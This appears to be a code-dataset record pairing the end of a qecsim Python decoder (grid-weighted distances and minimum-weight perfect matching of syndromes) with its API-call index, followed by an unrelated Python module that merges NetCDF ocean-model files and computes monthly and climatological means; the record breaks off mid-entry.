:type tgt_i: 2-tuple of int
:param factor: Multiplication factor.
:type factor: int or float
"""
src_i, tgt_i = self._syndrome_to_grid_index(src_i, tgt_i) # grid indices
(min_r, min_c), (max_r, max_c) = self._box_corners(src_i, tgt_i) # box corners
# loose box
self._multiply_box_complement((min_r - 1, min_c - 1), (max_r + 1, max_c + 1), factor)
# rounded corners
if min_r == max_r: # syndromes on same row
self._multiply_box((min_r - 1, min_c - 1), (max_r + 1, min_c), factor) # left
self._multiply_box((min_r - 1, max_c), (max_r + 1, max_c + 1), factor) # right
elif min_c == max_c: # syndromes on same column
self._multiply_box((min_r - 1, min_c - 1), (min_r, max_c + 1), factor) # top
self._multiply_box((max_r, min_c - 1), (max_r + 1, max_c + 1), factor) # bottom
else: # syndromes in corners of box
self._multiply_box((min_r - 1, min_c - 1), (min_r, min_c), factor) # top-left
self._multiply_box((max_r, max_c), (max_r + 1, max_c + 1), factor) # bottom-right
self._multiply_box((min_r - 1, max_c), (min_r, max_c + 1), factor) # top-right
self._multiply_box((max_r, min_c - 1), (max_r + 1, min_c), factor) # bottom-left
def _box_fitted(self, src_i, tgt_i, factor):
"""
Multiply all sites outside loose-box with rounded corners adjacent to syndrome indices.
:param src_i: Source syndrome index.
:type src_i: 2-tuple of int
:param tgt_i: Target syndrome index.
:type tgt_i: 2-tuple of int
:param factor: Multiplication factor.
:type factor: int or float
"""
src_i, tgt_i = self._syndrome_to_grid_index(src_i, tgt_i) # grid indices
(min_r, min_c), (max_r, max_c) = self._box_corners(src_i, tgt_i) # box corners
# loose box
self._multiply_box_complement((min_r - 1, min_c - 1), (max_r + 1, max_c + 1), factor)
# rounded corners (adjacent to syndrome indices only)
if min_r == max_r: # syndromes on same row
self._multiply_box((min_r - 1, min_c - 1), (max_r + 1, min_c), factor) # left
self._multiply_box((min_r - 1, max_c), (max_r + 1, max_c + 1), factor) # right
elif min_c == max_c: # syndromes on same column
self._multiply_box((min_r - 1, min_c - 1), (min_r, max_c + 1), factor) # top
self._multiply_box((max_r, min_c - 1), (max_r + 1, max_c + 1), factor) # bottom
elif min(src_i, tgt_i) == (min_r, min_c): # syndromes top-left and bottom-right
self._multiply_box((min_r - 1, min_c - 1), (min_r, min_c), factor) # top-left
self._multiply_box((max_r, max_c), (max_r + 1, max_c + 1), factor) # bottom-right
else: # syndromes top-right and bottom-left
self._multiply_box((min_r - 1, max_c), (min_r, max_c + 1), factor) # top-right
self._multiply_box((max_r, min_c - 1), (max_r + 1, min_c), factor) # bottom-left
def _box_loose(self, src_i, tgt_i, factor):
"""
Multiply all sites outside loose-box.
:param src_i: Source syndrome index.
:type src_i: 2-tuple of int
:param tgt_i: Target syndrome index.
:type tgt_i: 2-tuple of int
:param factor: Multiplication factor.
:type factor: int or float
"""
src_i, tgt_i = self._syndrome_to_grid_index(src_i, tgt_i) # grid indices
(min_r, min_c), (max_r, max_c) = self._box_corners(src_i, tgt_i) # box corners
# loose box
self._multiply_box_complement((min_r - 1, min_c - 1), (max_r + 1, max_c + 1), factor)
def distance(self, src_i, tgt_i, algorithm=4):
"""
Distance between syndrome indices weighted by the grid background.
Note:
* The distance algorithm defines the path(s) used to calculate distance between syndrome indices.
:param src_i: Source syndrome index.
:type src_i: 2-tuple of int
:param tgt_i: Target syndrome index.
:type tgt_i: 2-tuple of int
:param algorithm: Distance algorithm. (default=4, 1=v+h, 2=min(v+h,h+v), 4=min(v+h,h+v,v+h+v,h+v+h)
:type algorithm: int
:return: Distance.
:rtype: float
"""
assert algorithm in (1, 2, 4), 'StepGrid: Unsupported distance algorithm'
# if both indices virtual then zero weight
if not (self._code.is_in_bounds(src_i) or self._code.is_in_bounds(tgt_i)):
return 0
# find sum of weighted steps over matrix elements along path
if algorithm == 1:
distance = self._distance_1(src_i, tgt_i)
elif algorithm == 2:
distance = self._distance_2(src_i, tgt_i)
else:
distance = self._distance_4(src_i, tgt_i)
return distance
def _distance_1(self, src_i, tgt_i):
"""
Distance between syndrome indices as sum of site weights [down and across].
:param src_i: Source syndrome index.
:type src_i: 2-tuple of int
:param tgt_i: Target syndrome index.
:type tgt_i: 2-tuple of int
:return: Distance
:rtype: float
"""
src_i, tgt_i = self._syndrome_to_grid_index(src_i, tgt_i) # grid indices
(min_r, min_c), (max_r, max_c) = self._box_corners(src_i, tgt_i) # box corners
# sum down src column + sum across tgt row
return np.sum(self._grid[min_r:max_r, src_i[1]]) + np.sum(self._grid[tgt_i[0], min_c:max_c])
def _distance_2(self, src_i, tgt_i):
"""
Distance between syndrome indices taking the minimum of sums of site weights [down and across] and [across
and down].
:param src_i: Source syndrome index.
:type src_i: 2-tuple of int
:param tgt_i: Target syndrome index.
:type tgt_i: 2-tuple of int
:return: Distance
:rtype: float
"""
src_i, tgt_i = self._syndrome_to_grid_index(src_i, tgt_i) # grid indices
(min_r, min_c), (max_r, max_c) = self._box_corners(src_i, tgt_i) # box corners
# sum down src column + sum along tgt row
distance1 = np.sum(self._grid[min_r:max_r, src_i[1]]) + np.sum(self._grid[tgt_i[0], min_c:max_c])
# sum along src row + sum down tgt column
distance2 = np.sum(self._grid[src_i[0], min_c:max_c]) + np.sum(self._grid[min_r:max_r, tgt_i[1]])
return min(distance1, distance2)
def _distance_4(self, src_i, tgt_i):
"""
Distance between syndrome indices taking the minimum of sums of site weights [down and across], [across and
down], [half-way down, across, half-way down] and [half-way across, down, half-way across].
:param src_i: Source syndrome index.
:type src_i: 2-tuple of int
:param tgt_i: Target syndrome index.
:type tgt_i: 2-tuple of int
:return: Distance
:rtype: float
"""
src_i, tgt_i = self._syndrome_to_grid_index(src_i, tgt_i) # grid indices
(min_r, min_c), (max_r, max_c) = self._box_corners(src_i, tgt_i) # box corners
# sum down src column + sum along tgt row
distance1 = np.sum(self._grid[min_r:max_r, src_i[1]]) + np.sum(self._grid[tgt_i[0], min_c:max_c])
# sum along src row + sum down tgt column
distance2 = np.sum(self._grid[src_i[0], min_c:max_c]) + np.sum(self._grid[min_r:max_r, tgt_i[1]])
# sum half-way down src column + sum along mid-point row + sum half-way down tgt column
mid_r = (min_r + max_r) // 2
distance3 = (np.sum(self._grid[min_r:mid_r, src_i[1]])
+ np.sum(self._grid[mid_r, min_c:max_c])
+ np.sum(self._grid[mid_r:max_r, tgt_i[1]]))
# sum half-way along src row + sum down mid-point column + sum half-way along tgt row
mid_c = (min_c + max_c) // 2
distance4 = (np.sum(self._grid[src_i[0], min_c:mid_c])
+ np.sum(self._grid[min_r:max_r, mid_c])
+ np.sum(self._grid[tgt_i[0], mid_c:max_c]))
return min(distance1, distance2, distance3, distance4)
@functools.lru_cache()
def mwpm(self, matched_indices, syndrome_indices, factor=3, initial=1, box_shape='t', distance_algorithm=4):
"""
Minimum-weight perfect matching of syndrome indices over a background of matched dual syndrome indices.
Notes:
* The background is set according to :meth:`set_background`.
* A graph of the unmatched foreground indices is created, with appropriate virtual indices, and with edge
weights given by :meth:`distance`.
* A standard minimum-weight perfect matching is found in the graph.
:param matched_indices: Matched pairs of background syndrome indices (dual to foreground).
:type matched_indices: frozenset of 2-tuples of 2-tuple of int
:param syndrome_indices: Unmatched foreground syndrome indices.
:type syndrome_indices: frozenset of 2-tuple of int
:param factor: Multiplication factor. (default=3)
:type factor: int or float
:param initial: Initial edge weight. (default=1)
:type initial: int or float
:param box_shape: Shape of background boxes. (default='t', 't'=tight, 'r'=rounded, 'f'=fitted, 'l'=loose)
:type box_shape: str
:param distance_algorithm: Distance algorithm. (default=4, 1=v+h, 2=min(v+h,h+v), 4=min(v+h,h+v,v+h+v,h+v+h)
:type distance_algorithm: int
:return: Minimum-weight perfect matching of foreground syndrome indices.
:rtype: frozenset of 2-tuples of 2-tuple of int
"""
# set grid background
self.set_background(matched_indices, factor=factor, initial=initial, box_shape=box_shape)
# prepare graph
graph = gt.SimpleGraph()
# create lists of nodes and corresponding vnodes
# NOTE: encapsulate indices in node objects that implement object reference equality since we may pass
# multiple virtual plaquettes with the same index for matching.
nodes, vnodes = [], []
for index in syndrome_indices:
nodes.append(self._Node(index))
vnodes.append(self._Node(self._code.virtual_plaquette_index(index)))
# add weighted edges to graph
for a_node, b_node in itertools.chain(
itertools.combinations(nodes, 2), # all nodes to all nodes
itertools.combinations(vnodes, 2), # all vnodes to all vnodes
zip(nodes, vnodes)): # each node to corresponding vnode
# find weighted taxi-cab distance between a and b
distance = self.distance(a_node.index, b_node.index, algorithm=distance_algorithm)
# add edge with weight=distance
graph.add_edge(a_node, b_node, distance)
# find MWPM edges {(a, b), (c, d), ...}
mates = gt.mwpm(graph)
# convert to frozenset of sorted tuples {(a_index, b_index), ...}, removing matches if both indices virtual
matches = frozenset(tuple(sorted((a.index, b.index))) for a, b in mates
if self._code.is_in_bounds(a.index) or self._code.is_in_bounds(b.index))
return matches
class _Node:
# simple class to contain index and implement object reference equality for mwpm
__slots__ = ('index',)
def __init__(self, index):
self.index = index
|
[
"qecsim.model.cli_description",
"operator.index",
"numpy.sum",
"numpy.zeros",
"numpy.errstate",
"qecsim.graphtools.mwpm",
"itertools.combinations",
"qecsim.graphtools.SimpleGraph",
"functools.lru_cache",
"logging.getLogger"
] |
[((182, 209), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (199, 209), False, 'import logging\n'), ((213, 273), 'qecsim.model.cli_description', 'cli_description', (['"""Converging MWPM ([factor] FLOAT >=0, ...)"""'], {}), "('Converging MWPM ([factor] FLOAT >=0, ...)')\n", (228, 273), False, 'from qecsim.model import Decoder, cli_description\n'), ((24189, 24210), 'functools.lru_cache', 'functools.lru_cache', ([], {}), '()\n', (24208, 24210), False, 'import functools\n'), ((6772, 6796), 'numpy.errstate', 'np.errstate', ([], {'all': '"""raise"""'}), "(all='raise')\n", (6783, 6796), True, 'import numpy as np\n'), ((9368, 9431), 'numpy.zeros', 'np.zeros', (['(code.bounds[0] + 3, code.bounds[1] + 3)'], {'dtype': 'float'}), '((code.bounds[0] + 3, code.bounds[1] + 3), dtype=float)\n', (9376, 9431), True, 'import numpy as np\n'), ((25981, 25997), 'qecsim.graphtools.SimpleGraph', 'gt.SimpleGraph', ([], {}), '()\n', (25995, 25997), True, 'from qecsim import graphtools as gt\n'), ((27136, 27150), 'qecsim.graphtools.mwpm', 'gt.mwpm', (['graph'], {}), '(graph)\n', (27143, 27150), True, 'from qecsim import graphtools as gt\n'), ((21291, 21332), 'numpy.sum', 'np.sum', (['self._grid[min_r:max_r, src_i[1]]'], {}), '(self._grid[min_r:max_r, src_i[1]])\n', (21297, 21332), True, 'import numpy as np\n'), ((21335, 21376), 'numpy.sum', 'np.sum', (['self._grid[tgt_i[0], min_c:max_c]'], {}), '(self._grid[tgt_i[0], min_c:max_c])\n', (21341, 21376), True, 'import numpy as np\n'), ((22088, 22129), 'numpy.sum', 'np.sum', (['self._grid[min_r:max_r, src_i[1]]'], {}), '(self._grid[min_r:max_r, src_i[1]])\n', (22094, 22129), True, 'import numpy as np\n'), ((22132, 22173), 'numpy.sum', 'np.sum', (['self._grid[tgt_i[0], min_c:max_c]'], {}), '(self._grid[tgt_i[0], min_c:max_c])\n', (22138, 22173), True, 'import numpy as np\n'), ((22252, 22293), 'numpy.sum', 'np.sum', (['self._grid[src_i[0], min_c:max_c]'], {}), '(self._grid[src_i[0], min_c:max_c])\n', (22258, 22293), True, 'import numpy as np\n'), ((22296, 22337), 'numpy.sum', 'np.sum', (['self._grid[min_r:max_r, tgt_i[1]]'], {}), '(self._grid[min_r:max_r, tgt_i[1]])\n', (22302, 22337), True, 'import numpy as np\n'), ((23176, 23217), 'numpy.sum', 'np.sum', (['self._grid[min_r:max_r, src_i[1]]'], {}), '(self._grid[min_r:max_r, src_i[1]])\n', (23182, 23217), True, 'import numpy as np\n'), ((23220, 23261), 'numpy.sum', 'np.sum', (['self._grid[tgt_i[0], min_c:max_c]'], {}), '(self._grid[tgt_i[0], min_c:max_c])\n', (23226, 23261), True, 'import numpy as np\n'), ((23340, 23381), 'numpy.sum', 'np.sum', (['self._grid[src_i[0], min_c:max_c]'], {}), '(self._grid[src_i[0], min_c:max_c])\n', (23346, 23381), True, 'import numpy as np\n'), ((23384, 23425), 'numpy.sum', 'np.sum', (['self._grid[min_r:max_r, tgt_i[1]]'], {}), '(self._grid[min_r:max_r, tgt_i[1]])\n', (23390, 23425), True, 'import numpy as np\n'), ((23727, 23768), 'numpy.sum', 'np.sum', (['self._grid[mid_r:max_r, tgt_i[1]]'], {}), '(self._grid[mid_r:max_r, tgt_i[1]])\n', (23733, 23768), True, 'import numpy as np\n'), ((24069, 24110), 'numpy.sum', 'np.sum', (['self._grid[tgt_i[0], mid_c:max_c]'], {}), '(self._grid[tgt_i[0], mid_c:max_c])\n', (24075, 24110), True, 'import numpy as np\n'), ((26574, 26606), 'itertools.combinations', 'itertools.combinations', (['nodes', '(2)'], {}), '(nodes, 2)\n', (26596, 26606), False, 'import itertools\n'), ((26654, 26687), 'itertools.combinations', 'itertools.combinations', (['vnodes', '(2)'], {}), '(vnodes, 2)\n', (26676, 26687), False, 'import itertools\n'), ((4784, 4814), 'operator.index', 'operator.index', (['max_iterations'], {}), '(max_iterations)\n', (4798, 4814), False, 'import operator\n'), ((23592, 23633), 'numpy.sum', 'np.sum', (['self._grid[min_r:mid_r, src_i[1]]'], {}), '(self._grid[min_r:mid_r, src_i[1]])\n', (23598, 23633), True, 'import numpy as np\n'), ((23661, 23699), 'numpy.sum', 'np.sum', (['self._grid[mid_r, min_c:max_c]'], {}), '(self._grid[mid_r, min_c:max_c])\n', (23667, 23699), True, 'import numpy as np\n'), ((23934, 23975), 'numpy.sum', 'np.sum', (['self._grid[src_i[0], min_c:mid_c]'], {}), '(self._grid[src_i[0], min_c:mid_c])\n', (23940, 23975), True, 'import numpy as np\n'), ((24003, 24041), 'numpy.sum', 'np.sum', (['self._grid[min_r:max_r, mid_c]'], {}), '(self._grid[min_r:max_r, mid_c])\n', (24009, 24041), True, 'import numpy as np\n')]
|
from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file
from modeldata import Dimension
from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range
from utilities import get_variable_name, get_variable_name_reverse
import log
from netCDF4 import Dataset
from datetime import datetime
import numpy as np
import os
def merge_netcdfs_in_folder_to_single_file(input_dir,output_path,variables=['u','v'],velocities=None,log_file=None):
ncfiles = get_ncfiles_in_dir(input_dir)
log.info(log_file,f'Loading data {input_dir}{ncfiles[0]}')
modeldata = from_local_file(input_dir+ncfiles[0],variables=variables)
for ncfile in ncfiles[1:]:
netcdf = Dataset(input_dir+ncfile)
for variable_name in variables:
log.info(log_file,f'Appending {variable_name} data from {input_dir+ncfile}')
modeldata.append_to_variable(variable_name,netcdf[variable_name][:].filled(fill_value=np.nan))
log.info(log_file,f'Appending time data from {input_dir+ncfile}')
modeldata.append_to_time(netcdf['time'][:].filled(fill_value=np.nan))
netcdf.close()
if velocities == 'currents':
log.info(log_file,f'Adding absolute current velocity')
modeldata.add_absolute_current_velocity()
elif velocities == 'wind':
log.info(log_file,f'Adding absolute wind velocity')
modeldata.add_absolute_wind_velocity()
modeldata.write_to_netcdf(None,output_path=output_path)
def merge_variables_into_netcdf(input_dirs,output_dir,timeformat='%Y%m',log_file='edt/merge_netcdfs.log'):
main_input_dir = input_dirs[0]
input_dirs = input_dirs[1:]
nc_files = get_ncfiles_in_dir(main_input_dir)
for nc_file in nc_files:
log.info(log_file,f'Loading data {main_input_dir+nc_file}')
modeldata = from_local_file(main_input_dir+nc_file)
date0 = modeldata.time.datetime[0].date()
for input_dir in input_dirs:
nc_file_add = get_ncfiles_in_time_range(input_dir,date0,date0,timeformat=timeformat)
if len(nc_file_add) == 0:
continue
if len(nc_file_add) > 1:
raise ValueError(f'More than one netcdf file found in date range {date0.strftime(timeformat)}')
netcdf = Dataset(input_dir+nc_file_add[0])
variable_names = list(set(netcdf.variables.keys())-set(['time','depth','lat','lon']))
for variable_name in variable_names:
log.info(log_file,f'Adding variable {variable_name} to netcdf')
variable = netcdf_to_quantity(netcdf,variable_name)
modeldata.fill_variable(variable_name,variable)
netcdf.close()
output_path = modeldata.get_output_path(output_dir,filename_format=timeformat)
log.info(log_file,f'Saving merged netcdf to {output_path}')
_ = modeldata.write_to_netcdf(output_dir,filename_format=timeformat)
def get_monthly_means_from_local_daily_files(input_dir : str, output_dir : str,
input_filenameformat = '%Y%m%d',
output_filenameformat = '%Y%m',
log_file='merge_daily_to_monthly.log'):
ncfiles = get_ncfiles_in_dir(input_dir)
for ncfile in ncfiles:
ncfile_datestr,_ = os.path.splitext(ncfile)
ncfile_datetime = datetime.strptime(ncfile_datestr,input_filenameformat)
output_path = output_dir+ncfile_datetime.strftime(output_filenameformat)+'.nc'
if os.path.exists(output_path):
log.info(log_file,f'File already exists, skipping: {output_path}')
continue
log.info(log_file,f'Getting monthly means for {ncfile_datetime.month} {ncfile_datetime.year}')
start_date = datetime(ncfile_datetime.year,ncfile_datetime.month,1)
if ncfile_datetime.month < 12:
end_date = datetime(ncfile_datetime.year,ncfile_datetime.month+1,1)
ncfiles_merge = get_ncfiles_in_time_range(input_dir,start_date,end_date,including_end=0)
else:
end_date = datetime(ncfile_datetime.year,ncfile_datetime.month,31)
ncfiles_merge = get_ncfiles_in_time_range(input_dir,start_date,end_date,including_end=1)
log.info(log_file,f'Loading data from {input_dir+ncfiles_merge[0]}')
modeldata = from_local_file(input_dir+ncfiles_merge[0])
for i in range(1,len(ncfiles_merge)):
netcdf = Dataset(input_dir+ncfiles_merge[i])
variables = list(set(netcdf.variables.keys())-set(['time','depth','lat','lon']))
for variable in variables:
log.info(log_file,f'Appending data from {input_dir+ncfiles_merge[i]}')
variable_values = netcdf[variable][:].filled(fill_value=np.nan)
modeldata.append_to_variable(variable,variable_values)
netcdf.close()
log.info(log_file,f'Getting time mean values')
modeldata.take_time_mean()
modeldata.get_output_path(output_dir,filename_format=output_filenameformat)
log.info(log_file,f'Writing to {output_path}')
modeldata.write_to_netcdf(output_dir,filename_format=output_filenameformat)
def get_total_mean_from_local_files(input_dir,output_path,i_depths=None,i_lats=None,i_lons=None,
log_file='get_total_mean.log'):
ncfiles = get_ncfiles_in_dir(input_dir)
netcdf = Dataset(input_dir+ncfiles[0])
time = Dimension('time',np.array([0.0]),'days since 1900-01-01')
depth = netcdf_to_dimension(netcdf,'depth',new_name='depth',i_use=i_depths)
lon = netcdf_to_dimension(netcdf,'lon',new_name='lon',i_use=i_lons)
lat = netcdf_to_dimension(netcdf,'lat',new_name='lat',i_use=i_lats)
variables = list(set(netcdf.variables.keys())-set(['time','depth','lat','lon']))
netcdf.close()
modeldata = ModelData(time,depth,lat,lon)
for variable in variables:
n = 0
for ncfile in ncfiles:
netcdf = Dataset(input_dir+ncfile)
if n == 0:
quantity = netcdf_to_quantity(netcdf,variable,new_name=variable,i_depths=i_depths)
else:
next_quantity = netcdf_to_quantity(netcdf,variable,new_name=variable,i_depths=i_depths)
quantity.values = np.concatenate((quantity.values,next_quantity.values),axis=0)
netcdf.close()
next_quantity = None
n += 1
quantity.values = np.nanmean(quantity.values,axis=0)
modeldata.fill_variable(variable,quantity)
modeldata.write_to_netcdf(None,output_path=output_path)
def get_total_monthly_mean_from_local_files(input_dir : str, output_dir : str,
filename_format = '%Y%m', log_file='get_total_monthly_mean.log',
i_depths=None, i_lats=None, i_lons=None) -> ModelData:
ncfiles = get_ncfiles_in_dir(input_dir)
netcdf = Dataset(input_dir+ncfiles[0])
depth = netcdf_to_dimension(netcdf,'depth',new_name='depth',i_use=i_depths)
lon = netcdf_to_dimension(netcdf,'lon',new_name='lon',i_use=i_lons)
lat = netcdf_to_dimension(netcdf,'lat',new_name='lat',i_use=i_lats)
variables = list(set(netcdf.variables.keys())-set(['time','depth','lat','lon']))
netcdf.close()
for month in np.arange(1,13):
log.info(log_file, f'Getting total mean for month: {month}')
output_path = f'{output_dir}climatology_{datetime(1900,month,1).strftime("%b").lower()}.nc'
# initialise modeldata
time = Dimension('time',np.array([(datetime(1900,month,1)-datetime(1900,1,1)).days]),'days since 1900-01-01')
modeldata = ModelData(time,depth,lat,lon)
for variable in variables:
n = 0
for ncfile in ncfiles:
ncfile_datestr,_ = os.path.splitext(ncfile)
if datetime.strptime(ncfile_datestr,filename_format).month == month:
netcdf = Dataset(input_dir+ncfile)
if n == 0:
quantity = netcdf_to_quantity(netcdf,variable,new_name=variable,i_depths=i_depths)
else:
next_quantity = netcdf_to_quantity(netcdf,variable,new_name=variable,i_depths=i_depths)
quantity.values = np.concatenate((quantity.values,next_quantity.values),axis=0)
netcdf.close()
next_quantity = None
n += 1
quantity.values = np.nanmean(quantity.values,axis=0)
modeldata.fill_variable(variable,quantity)
log.info(log_file, f'Writing to file: {output_path}')
modeldata.write_to_netcdf(None, output_path=output_path)
|
[
"netCDF4.Dataset",
"modeldata.netcdf_to_dimension",
"utilities.get_ncfiles_in_dir",
"modeldata.from_local_file",
"os.path.exists",
"utilities.get_ncfiles_in_time_range",
"modeldata.netcdf_to_quantity",
"datetime.datetime",
"modeldata.ModelData",
"log.info",
"datetime.datetime.strptime",
"numpy.arange",
"os.path.splitext",
"numpy.array",
"numpy.concatenate",
"numpy.nanmean"
] |
[((496, 525), 'utilities.get_ncfiles_in_dir', 'get_ncfiles_in_dir', (['input_dir'], {}), '(input_dir)\n', (514, 525), False, 'from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range\n'), ((530, 589), 'log.info', 'log.info', (['log_file', 'f"""Loading data {input_dir}{ncfiles[0]}"""'], {}), "(log_file, f'Loading data {input_dir}{ncfiles[0]}')\n", (538, 589), False, 'import log\n'), ((605, 665), 'modeldata.from_local_file', 'from_local_file', (['(input_dir + ncfiles[0])'], {'variables': 'variables'}), '(input_dir + ncfiles[0], variables=variables)\n', (620, 665), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((1694, 1728), 'utilities.get_ncfiles_in_dir', 'get_ncfiles_in_dir', (['main_input_dir'], {}), '(main_input_dir)\n', (1712, 1728), False, 'from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range\n'), ((3298, 3327), 'utilities.get_ncfiles_in_dir', 'get_ncfiles_in_dir', (['input_dir'], {}), '(input_dir)\n', (3316, 3327), False, 'from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range\n'), ((5442, 5471), 'utilities.get_ncfiles_in_dir', 'get_ncfiles_in_dir', (['input_dir'], {}), '(input_dir)\n', (5460, 5471), False, 'from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range\n'), ((5485, 5516), 'netCDF4.Dataset', 'Dataset', (['(input_dir + ncfiles[0])'], {}), '(input_dir + ncfiles[0])\n', (5492, 5516), False, 'from netCDF4 import Dataset\n'), ((5596, 5666), 'modeldata.netcdf_to_dimension', 'netcdf_to_dimension', (['netcdf', '"""depth"""'], {'new_name': '"""depth"""', 'i_use': 'i_depths'}), "(netcdf, 'depth', new_name='depth', i_use=i_depths)\n", (5615, 5666), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((5674, 5738), 'modeldata.netcdf_to_dimension', 'netcdf_to_dimension', (['netcdf', '"""lon"""'], {'new_name': '"""lon"""', 'i_use': 'i_lons'}), "(netcdf, 'lon', new_name='lon', i_use=i_lons)\n", (5693, 5738), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((5746, 5810), 'modeldata.netcdf_to_dimension', 'netcdf_to_dimension', (['netcdf', '"""lat"""'], {'new_name': '"""lat"""', 'i_use': 'i_lats'}), "(netcdf, 'lat', new_name='lat', i_use=i_lats)\n", (5765, 5810), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((5928, 5960), 'modeldata.ModelData', 'ModelData', (['time', 'depth', 'lat', 'lon'], {}), '(time, depth, lat, lon)\n', (5937, 5960), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((6968, 6997), 'utilities.get_ncfiles_in_dir', 'get_ncfiles_in_dir', (['input_dir'], {}), '(input_dir)\n', (6986, 6997), False, 'from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range\n'), ((7011, 7042), 'netCDF4.Dataset', 'Dataset', (['(input_dir + ncfiles[0])'], {}), '(input_dir + ncfiles[0])\n', (7018, 7042), False, 'from netCDF4 import Dataset\n'), ((7053, 7123), 'modeldata.netcdf_to_dimension', 'netcdf_to_dimension', (['netcdf', '"""depth"""'], {'new_name': '"""depth"""', 'i_use': 'i_depths'}), "(netcdf, 'depth', new_name='depth', i_use=i_depths)\n", (7072, 7123), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((7131, 7195), 'modeldata.netcdf_to_dimension', 'netcdf_to_dimension', (['netcdf', '"""lon"""'], {'new_name': '"""lon"""', 'i_use': 'i_lons'}), "(netcdf, 'lon', new_name='lon', i_use=i_lons)\n", (7150, 7195), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((7203, 7267), 'modeldata.netcdf_to_dimension', 'netcdf_to_dimension', (['netcdf', '"""lat"""'], {'new_name': '"""lat"""', 'i_use': 'i_lats'}), "(netcdf, 'lat', new_name='lat', i_use=i_lats)\n", (7222, 7267), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((7386, 7402), 'numpy.arange', 'np.arange', (['(1)', '(13)'], {}), '(1, 13)\n', (7395, 7402), True, 'import numpy as np\n'), ((711, 738), 'netCDF4.Dataset', 'Dataset', (['(input_dir + ncfile)'], {}), '(input_dir + ncfile)\n', (718, 738), False, 'from netCDF4 import Dataset\n'), ((989, 1057), 'log.info', 'log.info', (['log_file', 'f"""Appending time data from {input_dir + ncfile}"""'], {}), "(log_file, f'Appending time data from {input_dir + ncfile}')\n", (997, 1057), False, 'import log\n'), ((1197, 1252), 'log.info', 'log.info', (['log_file', 'f"""Adding absolute current velocity"""'], {}), "(log_file, f'Adding absolute current velocity')\n", (1205, 1252), False, 'import log\n'), ((1766, 1828), 'log.info', 'log.info', (['log_file', 'f"""Loading data {main_input_dir + nc_file}"""'], {}), "(log_file, f'Loading data {main_input_dir + nc_file}')\n", (1774, 1828), False, 'import log\n'), ((1846, 1887), 'modeldata.from_local_file', 'from_local_file', (['(main_input_dir + nc_file)'], {}), '(main_input_dir + nc_file)\n', (1861, 1887), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((2826, 2886), 'log.info', 'log.info', (['log_file', 'f"""Saving merged netcdf to {output_path}"""'], {}), "(log_file, f'Saving merged netcdf to {output_path}')\n", (2834, 2886), False, 'import log\n'), ((3382, 3406), 'os.path.splitext', 'os.path.splitext', (['ncfile'], {}), '(ncfile)\n', (3398, 3406), False, 'import os\n'), ((3433, 3488), 'datetime.datetime.strptime', 'datetime.strptime', (['ncfile_datestr', 'input_filenameformat'], {}), '(ncfile_datestr, input_filenameformat)\n', (3450, 3488), False, 'from datetime import datetime\n'), ((3586, 3613), 'os.path.exists', 'os.path.exists', (['output_path'], {}), '(output_path)\n', (3600, 3613), False, 'import os\n'), ((3723, 3827), 'log.info', 'log.info', (['log_file', 'f"""Getting monthly means for {ncfile_datetime.month} {ncfile_datetime.year}"""'], {}), "(log_file,\n f'Getting monthly means for {ncfile_datetime.month} {ncfile_datetime.year}'\n )\n", (3731, 3827), False, 'import log\n'), ((3839, 3895), 'datetime.datetime', 'datetime', (['ncfile_datetime.year', 'ncfile_datetime.month', '(1)'], {}), '(ncfile_datetime.year, ncfile_datetime.month, 1)\n', (3847, 3895), False, 'from datetime import datetime\n'), ((4316, 4387), 'log.info', 'log.info', (['log_file', 'f"""Loading data from {input_dir + ncfiles_merge[0]}"""'], {}), "(log_file, f'Loading data from {input_dir + ncfiles_merge[0]}')\n", (4324, 4387), False, 'import log\n'), ((4405, 4450), 'modeldata.from_local_file', 'from_local_file', (['(input_dir + ncfiles_merge[0])'], {}), '(input_dir + ncfiles_merge[0])\n', (4420, 4450), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((4957, 5004), 'log.info', 'log.info', (['log_file', 'f"""Getting time mean values"""'], {}), "(log_file, f'Getting time mean values')\n", (4965, 5004), False, 'import log\n'), ((5131, 5178), 'log.info', 'log.info', (['log_file', 'f"""Writing to {output_path}"""'], {}), "(log_file, f'Writing to {output_path}')\n", (5139, 5178), False, 'import log\n'), ((5543, 5558), 'numpy.array', 'np.array', (['[0.0]'], {}), '([0.0])\n', (5551, 5558), True, 'import numpy as np\n'), ((6526, 6561), 'numpy.nanmean', 'np.nanmean', (['quantity.values'], {'axis': '(0)'}), '(quantity.values, axis=0)\n', (6536, 6561), True, 'import numpy as np\n'), ((7411, 7471), 'log.info', 'log.info', (['log_file', 'f"""Getting total mean for month: {month}"""'], {}), "(log_file, f'Getting total mean for month: {month}')\n", (7419, 7471), False, 'import log\n'), ((7741, 7773), 'modeldata.ModelData', 'ModelData', (['time', 'depth', 'lat', 'lon'], {}), '(time, depth, lat, lon)\n', (7750, 7773), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((8670, 8723), 'log.info', 'log.info', (['log_file', 'f"""Writing to file: {output_path}"""'], {}), "(log_file, f'Writing to file: {output_path}')\n", (8678, 8723), False, 'import log\n'), ((797, 876), 'log.info', 'log.info', (['log_file', 'f"""Appending {variable_name} data from {input_dir + ncfile}"""'], {}), "(log_file, f'Appending {variable_name} data from {input_dir + ncfile}')\n", (805, 876), False, 'import 